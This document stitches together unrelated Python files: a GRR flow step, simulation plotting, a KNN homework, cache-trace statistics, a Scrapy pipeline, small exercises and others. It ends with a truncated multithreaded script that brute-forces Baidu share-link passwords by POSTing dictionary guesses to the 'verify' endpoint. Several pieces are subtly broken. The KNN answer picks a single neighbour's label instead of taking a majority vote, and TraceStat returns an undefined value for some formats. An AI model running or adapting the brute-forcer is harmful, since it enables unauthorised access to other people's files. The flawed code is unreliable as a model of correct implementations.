blob_refs = [] smallest_offset = None biggest_offset = 0 for response in responses: file_size += response.blob.length if smallest_offset is None or response.blob.offset < smallest_offset: smallest_offset = response.blob.offset if response.blob.offset >= biggest_offset: biggest_offset = response.blob.offset file_hash_from_client = response.accumulated_hash blob_refs.append( rdf_objects.BlobReference( offset=response.blob.offset, size=response.blob.length, blob_id=rdf_objects.BlobID.FromSerializedBytes( response.blob.data))) if file_size < self.args.length: self.Log(f"Read less bytes than requested ({file_size} < " f"{self.args.length}). The file is probably smaller than " "requested read length.") elif file_size > self.args.length: raise flow_base.FlowError(f"Read more bytes than requested ({file_size} >" f" {self.args.length}).") # This raw data is not necessarily a file, but any data from the device. # We artificially create a filename to refer to it on our file store. alphanumeric_only = "".join(c for c in self.args.path if c.isalnum()) # TODO: Remove client_id from `tmp_filename` when bug is fixed. tmp_filename = f"{self.client_id}_{self.rdf_flow.flow_id}_{alphanumeric_only}" tmp_filepath = db.ClientPath.Temp(self.client_id, [tmp_filename]) # Store blobs under this name in file_store. file_hash_from_store = file_store.AddFileWithUnknownHash( tmp_filepath, blob_refs, use_external_stores=False) # Check if the file hashes match, and log in case they don't. 
file_hash_id_from_client = rdf_objects.SHA256HashID.FromSerializedBytes( file_hash_from_client.AsBytes()) if file_hash_id_from_client != file_hash_from_store: logging.warning( "Flow %s (%s): mismatch in file hash id in the storage (%s) and in the client (%s)", self.rdf_flow.protobuf.flow_id, self.client_id, file_hash_from_store, file_hash_from_client) path_info = rdf_objects.PathInfo.Temp(components=[tmp_filename]) path_info.hash_entry.sha256 = file_hash_from_store.AsBytes() path_info.hash_entry.num_bytes = file_size path_info.hash_entry.source_offset = smallest_offset # Store file reference for this client in data_store. data_store.REL_DB.WritePathInfos(self.client_id, [path_info]) result = rdf_read_low_level.ReadLowLevelFlowResult(path=tmp_filename) self.SendReply(result) def Done(self, responses): if not responses.success: raise flow_base.FlowError(responses.status.error_message)
import numpy as np import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt plt.rcParams['pdf.fonttype'] = 42 import bluepy cas_g = ['1p26', '1p28', '1p3', '1p32', '1p34', '1p36', '1p38', '1p4', '2p0'] cas_mvr = ['1p1', '1p15', '1p2', '1p21', '1p22', '1p23', '1p24', '1p25'] bcs_mvr = ['/gpfs/bbp.cscs.ch/project/proj9/simulations/nolte/variability/ca_scan_mvr/Ca%s/BlueConfig' % s for s in cas_mvr] bcs_g = ['/gpfs/bbp.cscs.ch/project/proj9/simulations/nolte/variability/ca_scan_g/Ca%s/BlueConfig' % s for s in cas_g] # bcs = ['/gpfs/bbp.cscs.ch/project/proj9/simulations/nolte/ei-balance/' \ # 'scan_layer5/Ca%s/BlueConfig' % s for s in cas] sim = bluepy.Simulation(bcs_mvr[0]) gids = np.array(list(sim.get_circuit_target())) gids_exc = np.random.permutation(np.intersect1d(np.array(list(sim.circuit.get_target('Excitatory'))), gids)) gids_inh = np.random.permutation(np.intersect1d(np.array(list(sim.circuit.get_target('Inhibitory'))), gids)) # bcs = bcs_0 names = ['MVR', 'det_syns'] for k, (bcs, cas) in enumerate(zip([bcs_mvr, bcs_g], [cas_mvr, cas_g])): fig, axs = plt.subplots(len(bcs), 2, figsize=(14, 14)) for i, bc in enumerate(bcs): print bc sim = bluepy.Simulation(bc) gids = np.array(list(sim.get_circuit_target())) od = sim.reports.spike.outdat ax = axs[i, 0] ax.set_xlim([0, 4000]) bins = np.linspace(0, 5000, 251) fr_norm = (bins[1] - bins[0])/1000.0 spikes = np.hstack(od.spikes_for_gids(gids_inh))[:100] ax.hist(spikes, bins=bins, histtype='step', color='blue', weights=np.ones(spikes.size) * fr_norm) spikes = np.hstack(od.spikes_for_gids(gids_exc))[:1000] ax.hist(spikes, bins=bins, histtype='step', color='darkred', weights=np.ones(spikes.size) * fr_norm) ax.set_xlabel('t (ms)') ax.set_ylabel('FR (Hz)') ax.set_title('[Ca2+] = %s mM' % cas[i]) ax = axs[i, 1] all_times = [] all_vmin = [] all_vmax = [] colors = [] for j, gid in enumerate(np.hstack([gids_inh[:100], gids_exc[:1000]])): #[np.random.permutation(gids.size)][:10000]): exc = 
sim.circuit.mvddb.get_gid(gid).mtype.synapse_class == 'EXC' times = od.spikes_for_gid(gid) times = times[times > 0.0] all_times.append(times) all_vmin.append(np.zeros(times.size) + j) all_vmax.append(np.zeros(times.size) + j + 10) color_options = ['blue', 'red'] colors += [color_options[exc] for t in times] ax.vlines(np.hstack(all_times), np.hstack(all_vmin), np.hstack(all_vmax), colors=colors, rasterized=True, linewidth=0.5) ax.set_xlabel('t (ms)') ax.set_ylabel('Cells') ax.set_title('[Ca2+] = %s mM' % cas[i]) plt.tight_layout() plt.savefig('ca_scan_%s.pdf' % names[k], dpi=300)
import numpy as np from sklearn import metrics,neighbors import sklearn from collections import Counter #------------------------------------------------------------------------- ''' Problem 1: k nearest neighbor In this problem, you will implement a classification method using k nearest neighbors. The main goal of this problem is to get familiar with the basic settings of classification problems. KNN is a simple method for classification problems. You need to install following python package: nose numpy scikit-learn You could type the following line in the terminal to install the package: pip3 install numpy pip3 install nose pip3 install sklearn ''' #-------------------------- def Terms_and_Conditions(): ''' By submitting this homework or changing this function, you agree with the following terms: (1) Not sharing your code/solution with any student before and after the homework due. For example, sending your code segment to another student, putting your solution online or lending your laptop (if your laptop contains your solution or your Dropbox automatically synchronize your solution between your home computer and your laptop) to another student to work on this homework will violate this term. (2) Not using anyone's code in this homework, build your own solution. For example, using some code segments from another student or online resources due to any reason (like too busy recently) will violate this term. Changing other people's code as your solution (such as changing the variable names) will also violate this term. (3) When discussing with any other student about this homework, only discuss high-level ideas or using pseudo-code. Don't discuss about the solution at the code level. 
For example, discussing with another student about the solution of a function (which needs 5 lines of code to solve), and then working on the solution "independently", however the code of the two solutions are exactly the same, or only with minor differences (like changing variable names) will violate this term. All violations of (1),(2) or (3) will be handled in accordance with the WPI Academic Honesty Policy. For more details, please visit: https://www.wpi.edu/about/policies/academic-integrity/dishonesty Historical Data: in one year, we ended up finding 25% of the students in the class violating this term in their homework submissions and we handled ALL of these violations according to the WPI Academic Honesty Policy. ''' #**************************************** ## CHANGE CODE HERE Read_and_Agree = True #if you have read and agree with the term above, change "False" to "True". #**************************************** return Read_and_Agree #-------------------------- def compute_distance(Xtrain, Xtest): ''' compute the Euclidean distance between instances in a test set and a training set Input: Xtrain: the feature matrix of the training dataset, a float python matrix of shape (n_train by p). Here n_train is the number of data instance in the training set, p is the number of features/dimensions. Xtest: the feature matrix of the test dataset, a float python matrix of shape (n_test by p). Here n_test is the number of data instance in the test set, p is the number of features/dimensions. Output: D: the distance between instances in Xtest and Xtrain, a float python matrix of shape (ntest, ntrain), the (i,j)-th element of D represents the Euclidean distance between the i-th instance in Xtest and j-th instance in Xtrain. 
For example, if we have a training set of 3 instances with 2 dimensional features: Xtrain = 1, 2 2, 1 2, 2 We also have a test dataset of 2 isntances: Xtest = 3, 4 5, 6 The Euclidean distance between the first test instance (1,2) and the first training instance (3,4) is computed as: D[0,0] = square_root( (1-3)^2 + (2-4)^2 ) = 2.828 Similarly we can compute all the pairs between Xtest and Xtrain, then D is a matrix of shape 2 X 3: D[i,j] is the Euclidean distance between the i-th instance in Xtest and the j-th instance in Xtrain. ''' ######################################### ## INSERT YOUR CODE HERE D = sklearn.metrics.pairwise.euclidean_distances(Xtest,Xtrain) ######################################### return D ''' TEST: Now you can test the correctness of your code above by typing `nosetests -v test1.py:test_compute_distance' in the terminal. ''' #-------------------------- def k_nearest_neighbor(Xtrain, Ytrain, Xtest, K = 3): ''' compute the labels of test data using the K nearest neighbor classifier. Input: Xtrain: the feature matrix of the training dataset, a float numpy matrix of shape (n_train by p). Here n_train is the number of data instance in the training set, p is the number of features/dimensions. Ytrain: the label vector of the training dataset, an integer python list of length n_train. Each element in the list represents the label of the training instance. The values can be 0, ..., or num_class-1. num_class is the number of classes in the dataset. Xtest: the feature matrix of the test dataset, a float python matrix of shape (n_test by p). Here n_test is the number of data instance in the test set, p is the number of features/dimensions. K: the number of neighbors to consider for classification. Output: Ytest: the predicted labels of test data, an integer numpy vector of length ntest. Note: you cannot use any existing package for KNN classifier. 
''' ######################################### ## INSERT YOUR CODE HERE # number of testing instances inst = len(Xtest) # compute distances between test set and training set dist = compute_distance(Xtrain,Xtest) order = np.array([np.argpartition(row,K-1)[:K] for row in dist]) Ytest = [] for s in order: idx = s[K-2] Ytest.append(Ytrain[idx]) Ytest = np.array(Ytest) ######################################### return Ytest ''' TEST: Now you can test the correctness of your code above by typing `nosetests -v test1.py:test_k_nearest_neighbor' in the terminal. ''' #-------------------------------------------- ''' TEST Problem 2: Now you can test the correctness of all the above functions by typing `nosetests -v test1.py' in the terminal. If your code passed all the tests, you will see the following message in the terminal: ----------- Problem 1 (10 points in total)-------------- ... ok (3 points) compute_distance ... ok (5 points) k_nearest_neighbor ... ok (2 points) test on a dataset ... ok ---------------------------------------------------------------------- Ran 5 tests in 0.336s OK ERROR Message: If your code has an error, you will see an error message with the line number of the error: For example: ====================================================================== FAIL: (3points) test_compute_distance() ---------------------------------------------------------------------- Traceback (most recent call last): File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/nose/case.py", line 198, in runTest self.test(*self.arg) File "test1.py", line 47, in test_compute_distance assert np.allclose(D, D_true, atol = 1e-4) AssertionError This error message means: (1) You are using python 3.6, See: "... Versions/3.6/lib/python3.6/ ... " (2) Your code failed in Line 47, the test_compute_distance function in test1.py file See: " ... 
File "test1.py", line 47, in test_compute_distance " (3) The specific test that failed is that the D should equals to the true answer D_true, but in your code, a different result is returned. See: " assert np.allclose(D, D_true, atol = 1e-4) AssertionError " Debug: To debug your code, you could insert a print statement before Line 47 of test1.py file: print(D) Then run the test again. Now after the error message, the value of D will be printed like this: -------------------- >> begin captured stdout << --------------------- [[1. 1.4 1. ] [2. 2. 2. ]] --------------------- >> end captured stdout << ---------------------- Then we know that the value of D output by your current code. ''' #--------------------------------------------
import os
import numpy as np
import sys
import subprocess

# Base directory that holds one sub-directory per analysis channel.
_BASE_DIR = "/Users/diegobarbosa/Desktop/Limits/LimitCardsMaker_Zprime_13TeV_2021/"

# channel number -> (channel name, hadd command merging the backgrounds into data.root)
_CHANNELS = {
    1: ("etau",
        "hadd data.root DY+Jets_2016.root QCD_2016.root SingleTop_2016.root VV_2016.root W+Jets_2016.root ttbar_2016.root"),
    2: ("mutau",
        "hadd data.root DY_2016.root QC_2016.root ST_2016.root TT_2016.root VV_2016.root WJ_2016.root"),
    3: ("tautau",
        "hadd data.root DY+Jets_Histogram.root QCD_Histogram.root SingleTop_Histogram.root VV_Histogram.root W+Jets_Histogram.root tbar\{t\}_Histogram.root"),
}


def createtxt():
    """Prompt for an analysis channel, cd into its directory and hadd its
    background histograms into data.root.

    Exits the process when the typed channel number is not 1, 2 or 3.
    The three channels previously had three near-identical copies of this
    logic; the table above removes the duplication.
    """
    print('Enter the number of the channel:\n')
    print('etau =1 , mutau=2 or tautau=3 (wo quotation)')
    x = int(input())
    if x in _CHANNELS:
        print('VALID CHANNEL')
        channel, hadd_cmd = _CHANNELS[x]
        path = _BASE_DIR + channel
        os.chdir(path)
        print("Directory changed to" + channel + "+" + path)
        os.system(hadd_cmd)
    else:
        print('Not a Valid Channel!')
        sys.exit()


def main():
    createtxt()


if __name__ == '__main__':
    main()
__author__ = 'regu0004' # SAML attribute to verify affiliation with AFFILIATION_ATTRIBUTE = 'eduPersonAffiliation' # Values the RP can request in OpenID Connect parameter 'scope' in the Auth req. PERSISTENT_NAMEID = 'persistent' TRANSIENT_NAMEID = 'transient' # Supported claims in the Auth req DOMAIN = 'domain' COUNTRY = 'country' def get_affiliation_function(scope): """Returns the comparison function for the affiliation specified in the requested scope. :param scope: requested scope from the RP :return: function to verify the users affiliation """ for affiliation in AFFILIATIONS: if affiliation in scope: return AFFILIATIONS[affiliation] def _is_student(identity): return _contains_any(['student'], _get_affiliation_attribute(identity)) def _is_member(identity): return _contains_any(['member'], _get_affiliation_attribute(identity)) def _is_employee(identity): return _contains_any(['employee'], _get_affiliation_attribute(identity)) def _is_affiliated(identity): return _is_student(identity) or _is_employee(identity) or _is_member( identity) def _is_alumni(identity): return _contains_any(['alum'], _get_affiliation_attribute(identity)) def _is_faculty_or_staff(identity): return _contains_any(['faculty', 'staff'], _get_affiliation_attribute(identity)) def _contains_any(accepted_values, bag): for v in accepted_values: if v in bag: return v return None def _get_affiliation_attribute(identity): """ Return the list of affiliations. :param identity: attributes returned from IdP :return: list of affiliations, or empty list if the affiliation attribute does not exist """ return identity.get(AFFILIATION_ATTRIBUTE, []) # Mapping between the possible scope values for requesting verification of a certain affiliation AFFILIATIONS = { 'affiliated': _is_affiliated, 'student': _is_student, 'employee': _is_employee, 'faculty+staff': _is_faculty_or_staff, 'alum': _is_alumni } # All scope values we understand SCOPE_VALUES = AFFILIATIONS.keys() + [PERSISTENT_NAMEID, TRANSIENT_NAMEID]
''' Created on 2014. 11. 26. @author: user ''' from Orange import data from DoC import page, time as t, status, user_agent import split_session as ss import Feature_Set as fs import refine_data as rd from Analysis.Freq import ip_freq from Analysis.Freq import query_markov from time import time vDom = data.Domain([fs.ip, fs.DoC_t, fs.DoC_p, fs.DoC_ua, fs.DoC_s], False) def SimpsonIndex_count(basket): S = sum(basket) if S < 2: return 0 R = sum([x*(x-1) for x in basket if x > 1]) return float(R)/(S*(S-1)) def SimpsonIndex_prob(probDistbasket): return sum([p*p for p in probDistbasket]) def getDoCInstance(_ip_DataSet, IP): #ip_freq.add_value(IP) result = [IP] t_Data = [d["t_offset"].value for d in _ip_DataSet] sessList = ss.split_time(t_Data, 900) timeDoC = 0 for s in sessList: t_hist, t_bins = t.get_tHistogram(s, 15) timeDoC = max([timeDoC, t.getDoC(t_hist)]) ua_Dist = user_agent.getDoCDist(_ip_DataSet) p_Dist = page.getDoCDist(_ip_DataSet) result.append(timeDoC) result.append(SimpsonIndex_count(p_Dist.values())) try: result.append(1-SimpsonIndex_count(ua_Dist.values())) except AttributeError: result.append(None) result.append(status.get_404ratio(_ip_DataSet)) return result def getDoCTable(DataSet, indexMap): ip_List = list(set([x['ip'].value for x in DataSet])) DoC_Table = data.Table(vDom) DoCList = [] for i in ip_List: DoCList.append(getDoCInstance(DataSet.get_items_ref(indexMap[i]), i)) DoC_Table.extend(DoCList) return DoC_Table def DoC_filtering(DataSet, DoCTable, t_range=(0,1), u_range=(0,1), p_range=(0,1), s_range=(0,1)): filtered = DoCTable.filter_ref({"time_DoC": t_range, "u_agent_DoC": u_range, "page_DoC": p_range, "status_DoC": s_range }) ip_List = [d["ip"].value for d in filtered] return DataSet.filter_ref(ip=ip_List), ip_List def getFeatureVectors(DataSet, indexMap): DoCT = getDoCTable(DataSet, indexMap) ipFT = ip_freq.getTable(DataSet) pageFT = query_markov.getTable(DataSet) Merged = data.Table([DoCT, ipFT, pageFT]) return Merged def 
extract_feature(data_path, save_path): DataSet = data.Table(data_path) rData = rd.remove_tiny(DataSet) indexMap = rd.getindexMap(rData) Feat_Table = getFeatureVectors(rData, indexMap) Feat_Table.save(save_path) def main(): data_path = raw_input("path > ") save_path = raw_input("save path > ") extract_feature(data_path,save_path) #DoCT = getFeatureVectors(Data) #Save_path = raw_input("save path > ") if __name__ == '__main__': main()
# coding=utf-8 """ this module calculates the stat of the trace """ from pprint import pformat from collections import defaultdict class TraceStat: """ this class provides statistics calculation of a given trace """ def __init__(self, reader, top_N_popular=8): self.reader = reader self.top_N_popular = top_N_popular # stat data representation: # 0: not initialized, # -1: error while obtaining data self.num_of_requests = 0 self.num_of_uniq_obj = 0 self.cold_miss_ratio = 0 self.top_N_popular_obj = [] self.num_one_hit_wonders = 0 self.freq_mean = 0 self.time_span = 0 self.ttl_dict = defaultdict(int) self.top_ttl_dict = {} self.key_size_mean_weighted_by_req = 0 self.value_size_mean_weighted_by_req = 0 self.obj_size_mean_weighted_by_req = 0 self.req_size_mean_weighted_by_req = 0 self.key_size_mean_weighted_by_obj = 0 self.value_size_mean_weighted_by_obj = 0 self.obj_size_mean_weighted_by_obj = 0 self.req_size_mean_weighted_by_obj = 0 self.op_ratio = defaultdict(int) self._calculate() def _calculate(self): """ calculate all the stat using the reader :return: """ req_cnt = defaultdict(int) sum_key_size_req, sum_value_size_req, sum_obj_size_req, sum_req_size_req = 0, 0, 0, 0 sum_key_size_obj, sum_value_size_obj, sum_obj_size_obj, sum_req_size_obj = 0, 0, 0, 0 first_req = next(self.reader) n_nonzero_sz_obj = 0 for req in self.reader: if req.req_size > 0: sum_key_size_req += req.key_size * req.cnt sum_value_size_req += req.value_size * req.cnt sum_obj_size_req += req.obj_size * req.cnt sum_req_size_req += req.req_size * req.cnt if req.obj_id not in req_cnt: sum_key_size_obj += req.key_size sum_value_size_obj += req.value_size sum_obj_size_obj += req.obj_size sum_req_size_obj += req.req_size n_nonzero_sz_obj += 1 if req.op: self.op_ratio[req.op] += 1 if req.op in ("set", "add", "set", "add", "cas", "replace", "append", "prepend"): ttl = req.ttl # round up if abs(ttl//10*10 - ttl) <= 2: ttl = ttl // 10 * 10 if ttl < 3600: ttl = "{}s".format(ttl) elif 24*3600 > ttl >= 3600: ttl 
= "{:.1f}h".format(ttl/3600) elif ttl >= 24*3600: ttl = "{:.1f}d".format(ttl/3600/24) ttl = ttl.replace(".0", "") self.ttl_dict[ttl] += 1 req_cnt[req.obj_id] += req.cnt last_req = req self.reader.reset() self.num_of_uniq_obj = len(req_cnt) self.num_of_requests = sum(req_cnt.values()) self.cold_miss_ratio = self.num_of_uniq_obj / self.num_of_requests self.time_span = last_req.real_time - first_req.real_time if n_nonzero_sz_obj == 0: print("all requests size 0") else: self.key_size_mean_weighted_by_req = sum_key_size_req/self.num_of_requests self.value_size_mean_weighted_by_req = sum_value_size_req/self.num_of_requests self.obj_size_mean_weighted_by_req = sum_obj_size_req/self.num_of_requests self.req_size_mean_weighted_by_req = sum_req_size_req/self.num_of_requests self.key_size_mean_weighted_by_obj = sum_key_size_obj/n_nonzero_sz_obj self.value_size_mean_weighted_by_obj = sum_value_size_obj/n_nonzero_sz_obj self.obj_size_mean_weighted_by_obj = sum_obj_size_obj/n_nonzero_sz_obj self.req_size_mean_weighted_by_obj = sum_req_size_obj/n_nonzero_sz_obj for op, cnt in self.op_ratio.items(): self.op_ratio[op] = cnt/self.num_of_requests # find the top ttl used in the workload total_ttl_cnt = sum(self.ttl_dict.values()) for ttl, cnt in sorted(self.ttl_dict.items(), key=lambda x:-x[1]): self.top_ttl_dict[ttl] = cnt/total_ttl_cnt if len(self.top_ttl_dict) >= 10: break # l is a list of (obj, freq) in descending order l = sorted(req_cnt.items(), key=lambda x: x[1], reverse=True) self.top_N_popular_obj = l[:self.top_N_popular] # count one-hit-wonders for i in range(len(l)-1, -1, -1): if l[i][1] == 1: self.num_one_hit_wonders += 1 else: break self.freq_mean = self.num_of_requests / (float) (self.num_of_uniq_obj) def _gen_stat_str(self): """ gegerate a stat str """ s = "dat: {}\nnumber of requests: {}\nnumber of uniq obj/blocks: {}\n" \ "cold miss ratio: {:.4f}\ntop N popular (obj, num of requests): \n{}\n" \ "number of obj/block accessed only once: {} ({:.4f})\n" \ 
"weighted_by_req: obj_size_mean {:.0f}, req_size_mean {:.0f}, key_size_mean {:.0f}, value_size_mean {:.0f}\n"\ "weighted_by_obj: obj_size_mean {:.0f}, req_size_mean {:.0f}, key_size_mean {:.0f}, value_size_mean {:.0f}\n"\ "frequency mean: {:.2f}\n".format(self.reader.trace_path, self.num_of_requests, self.num_of_uniq_obj, self.cold_miss_ratio, pformat(self.top_N_popular_obj), self.num_one_hit_wonders, self.num_one_hit_wonders/self.num_of_uniq_obj, self.obj_size_mean_weighted_by_req, self.req_size_mean_weighted_by_req, self.key_size_mean_weighted_by_req, self.value_size_mean_weighted_by_req, self.obj_size_mean_weighted_by_obj, self.req_size_mean_weighted_by_obj, self.key_size_mean_weighted_by_obj, self.value_size_mean_weighted_by_obj, self.freq_mean) if self.time_span: s += "time span: {} ({:.2f} day)\n".format(self.time_span, self.time_span/3600/24) if len(self.op_ratio): op_ratio_str = "op: " + ", ".join(["{}:{:.4f}".format(op, ratio) for op, ratio in self.op_ratio.items()]) s += op_ratio_str + "\n" # s += "op ratio: {}\n".format(pformat(self.op_ratio)) if len(self.top_ttl_dict): s += "ttl: {} ttls used, ".format(len(self.ttl_dict)) + ", ".join(["{}:{:.4f}".format(ttl, ratio) for ttl, ratio in self.top_ttl_dict.items() if ratio >= 0.01]) return s def _gen_stat_json(self): raise RuntimeError("not implemented") def get_stat(self, return_format="str"): """ return stat in the format of string or tuple :param return_format: :return: """ if return_format == "str": return self._gen_stat_str() elif return_format == "tuple": return (self.num_of_requests, self.num_of_uniq_obj, self.cold_miss_ratio, self.top_N_popular_obj, self.num_one_hit_wonders, self.freq_mean, self.time_span) elif return_format == "dict": d = self.__dict__.copy() elif return_format == "json": return self._gen_json() else: raise RuntimeError("unknown return format, return string instead") return s def get_top_N(self): return self.top_N_popular_obj def __repr__(self): return self.get_stat() def 
__str__(self): return self.get_stat()
# -*- coding: utf-8 -*- # Define your item pipelines here # # Don't forget to add your pipeline to the ITEM_PIPELINES setting # See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html import datetime import re from job51.items import Job51Item class Job51Pipeline(object): def process_item(self, item, spider): data = Job51Item(item) # 去除每个属性数据中的 \t字符,再用 \t字符作为分隔符 # 在hadoop中就以 \t为分隔符来切割记录 # 由于dict中各个字段的顺序不固定,所以采用这种方式 output_data = (data["category"] + "\t" + re.sub(r"\s+", " ", data["title"]).strip() + "\t" + data["salary"] + "\t" + data["place"] + "\t" + data["experience"] + "\t" + data["education"] + "\t" + data["need_persons"] + "\t" + data["publish_date"] + "\t" + data["url"] + "\t" + re.sub(r"\s+", " ", data["need_skill"]).strip()) + "\n" # 通过category属性,把记录写入相应的文件 now_day = str(datetime.datetime.now().date()) file_path = "D:/Code/GraduationProject/files/{0}_{1}_{2}.txt"\ .format(now_day, "51Job", data["category"]) with open(file_path, "a", encoding="utf-8") as f: f.write(output_data)
# Read an integer from stdin and print its factorial (or an error for
# negative input).
n = int(input())

if n == 0:
    print("factorial is 1")
elif n < 0:
    print("not possible")
else:
    fact = 1
    # Multiply the running product by every integer up to n.
    for factor in range(1, n + 1):
        fact *= factor
    print("factorial of ", n, "is", fact)
from django.contrib.auth.models import User
from django.db import models


class Task(models.Model):
    """A single to-do item owned by one user."""

    # Short label for the task; required (neither NULL nor blank).
    title = models.CharField(max_length=255, null=False, blank=False)
    # Longer free-text body; required.
    description = models.TextField(null=False, blank=False)
    # Completion flag; new tasks start as not done.
    is_done = models.BooleanField(default=False)
    # Owning user; deleting the user cascades to their tasks.
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='user_tasks')
    # Audit timestamps, maintained automatically by Django.
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)

    class Meta:
        # A user cannot have two tasks with the same title.
        unique_together = ('title', 'user')

    def __str__(self):
        return self.title
#!/usr/bin/python
#coding=utf-8


def binary_search(f_n, f_l):
    """Binary-search the sorted list ``f_l`` for value ``f_n``.

    :type f_n: int
    :type f_l: list
    :rtype: int -- index of ``f_n`` in ``f_l``, or -1 if absent.
    """
    low = 0
    # BUG FIX: the upper bound must be the last valid index, not len(f_l);
    # the old value let mid reach len(f_l) and raise IndexError when
    # searching for a value greater than every element.
    high = len(f_l) - 1
    while low <= high:
        # BUG FIX: use floor division -- "/" yields a float on Python 3,
        # and list indices must be integers.
        mid = (low + high) // 2
        if f_l[mid] == f_n:
            return mid
        elif f_l[mid] < f_n:
            low = mid + 1
        else:
            high = mid - 1
    return -1


if __name__ == '__main__':
    f_list = [1, 2, 3, 7, 8, 9, 10, 5]
    f_list.sort()
    print("原有序列表为:{}".format(f_list))
    try:
        f_num = int(input("请输入要查找的数:"))
    # BUG FIX: catch only the conversion error instead of a bare except,
    # which also swallowed KeyboardInterrupt/SystemExit.
    except ValueError:
        print("请输入正确的数!")
        exit()
    result = binary_search(f_num, f_list)
    if result != -1:
        print("要找的元素 {} 的序号为:{}".format(f_num, result))
    else:
        print("未找到!")
# -*- coding: utf-8 -*-
# =============================================================================
# Created on Sat Aug 3 13:00:11 2019
#
# @author: Brénainn Woodsend
#
#
# BaseFigure.py provides a base class for vpl figures.
# Copyright (C) 2019 Brénainn Woodsend
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
# =============================================================================

from __future__ import print_function
from builtins import super

import numpy as np
import sys
import os
from pathlib2 import Path

from .render_window import VTKRenderer
from .figure_manager import reset_camera, scf, gcf


class BaseFigure(VTKRenderer):
    """Base class for vpl figures: a VTKRenderer plus bookkeeping of the
    plots attached to it and integration with the current-figure machinery
    in ``figure_manager`` (scf/gcf)."""

    def __init__(self, name=""):
        super().__init__()
        # Register this figure as the current figure (matplotlib-style gcf).
        scf(self)

        # Just for fun
        if name:
            self.window_name = name
        else:
            try:
                import namegenerator
                self.window_name = namegenerator.gen().replace("-", " ").title()
            except ImportError:
                self.window_name = "VTK figure"

        # All plot objects currently attached to this figure.
        self.plots = set()

    # Whether the next show() should reset the camera; cleared after the
    # first show() so later shows keep the user's viewpoint.
    _reset_camera = True

    def reset_camera(self):
        """Re-frame the camera to fit this figure's contents (delegates to
        figure_manager.reset_camera)."""
        return reset_camera(self)

    def show(self, block=True):
        """Open the render window; with ``block=True`` this does not return
        until the window is closed."""
        # Try and force the console to finish displaying any preceding print
        # statements before VTK start is called and blocks everything. Rather
        # limited success.
        try:
            # python 2 doesn't have flush
            print(end="", flush=True)
        except TypeError:
            pass
        sys.stdout.flush()
        for attr in ("buffer", "_buffer"):
            if hasattr(sys.stdout, attr):
                getattr(sys.stdout, attr).flush()

        self.start(block, self._reset_camera)
        # Camera only gets reset automatically the first time self.show() is
        # called.
        self._reset_camera = False
        # After a blocking show finishes, stop being the current figure.
        if block and gcf() is self:
            scf(None)

    def add_plot(self, plot):
        """Attach *plot* to this figure; an object ndarray of plots is
        handled element-wise."""
        if isinstance(plot, np.ndarray) and plot.dtype == object:
            [self.add_plot(i) for i in plot.flat]
            return
        if plot not in self.plots:
            self._add_actor(plot.actor)
            self.plots.add(plot)

    def remove_plot(self, plot):
        """Detach *plot* from this figure; an object ndarray of plots is
        handled element-wise."""
        if isinstance(plot, np.ndarray) and plot.dtype == object:
            [self.remove_plot(i) for i in plot.flat]
            return
        if plot in self.plots:
            self._remove_actor(plot.actor)
            self.plots.remove(plot)

    def __iadd__(self, plot):
        # ``figure += plot`` is shorthand for add_plot().
        self.add_plot(plot)
        return self

    def __isub__(self, plot):
        # ``figure -= plot`` is shorthand for remove_plot().
        self.remove_plot(plot)
        return self

    @property
    def render_size(self):
        """Get the render image size (width, height) in pixels.

        Note that if the figure is a QtFigure then the setter will be
        constantly overridden by the parent widget's resizing."""
        return self.renWin.GetSize()

    @render_size.setter
    def render_size(self, size):
        self.renWin.SetSize(*size)


if __name__ == "__main__":
    pass
#! /usr/bin/env python

# Public Domain (-) 2004-2011 The Assetgen Authors.
# See the Assetgen UNLICENSE file for details.

from setuptools import setup

# ------------------------------------------------------------------------------
# Run Setup
# ------------------------------------------------------------------------------

# Read the long description up front with a context manager so the file
# handle is closed promptly instead of leaking via open(...).read() inline
# inside the setup() call.
with open('README.rst') as readme_file:
    LONG_DESCRIPTION = readme_file.read()

setup(
    name="assetgen",
    author="tav",
    author_email="tav@espians.com",
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Environment :: Web Environment",
        "Intended Audience :: Developers",
        "License :: Public Domain",
        "Operating System :: OS Independent",
        "Programming Language :: Python",
        "Topic :: Text Processing",
        "Topic :: Utilities"
    ],
    description="Asset generator for modern web app development",
    entry_points=dict(console_scripts=[
        "assetgen = assetgen:main"
    ]),
    install_requires=[
        "PyYAML>=3.09",
        "requests>=0.14.1",
        "simplejson>=2.1.6",
        "tavutil>=1.0"
    ],
    keywords=["assets", "javascript", "css", "coffeescript", "sass"],
    license="Public Domain",
    long_description=LONG_DESCRIPTION,
    packages=["assetgen"],
    url="https://github.com/tav/assetgen",
    version="0.2.2",
    zip_safe=True
)
# !/usr/bin/env python # -*- encoding: utf-8 -*- import Queue import sys import threading import time import optparse import requests from lib.consle_width import getTerminalSize class baiduBrute: def __init__(self, target, threads_num): self.target = target.replace("link", "verify").replace("init", "verify").strip() self.names_file = "./dic.txt" self.thread_count = self.threads_num = threads_num self.scan_count = self.found_count = 0 self.lock = threading.Lock() self.console_width = getTerminalSize()[0] self.console_width -= 2 # Cal width when starts up self._load_pass() # outfile = target + '.txt' if not output else output # self.outfile = open(outfile, 'w') # won't close manually self.headers = { "Content-Type": "application/x-www-form-urlencoded" } # 读入队列 def _load_pass(self): self.queue = Queue.Queue() with open(self.names_file) as f: for line in f: sub = line.strip() if sub: self.queue.put(sub) def _update_scan_count(self): self.lock.acquire() self.scan_count += 1 self.lock.release() def _print_progress(self): self.lock.acquire() msg = '%s found | %s remaining | %s scanned in %.2f seconds' % ( self.found_count, self.queue.qsize(), self.scan_count, time.time() - self.start_time) sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) + msg) sys.stdout.flush() self.lock.release() def _scan(self): while self.queue.qsize() > 0: payload = self.queue.get(timeout=1.0) try: res = requests.post(url=self.target, data="pwd=" + payload, 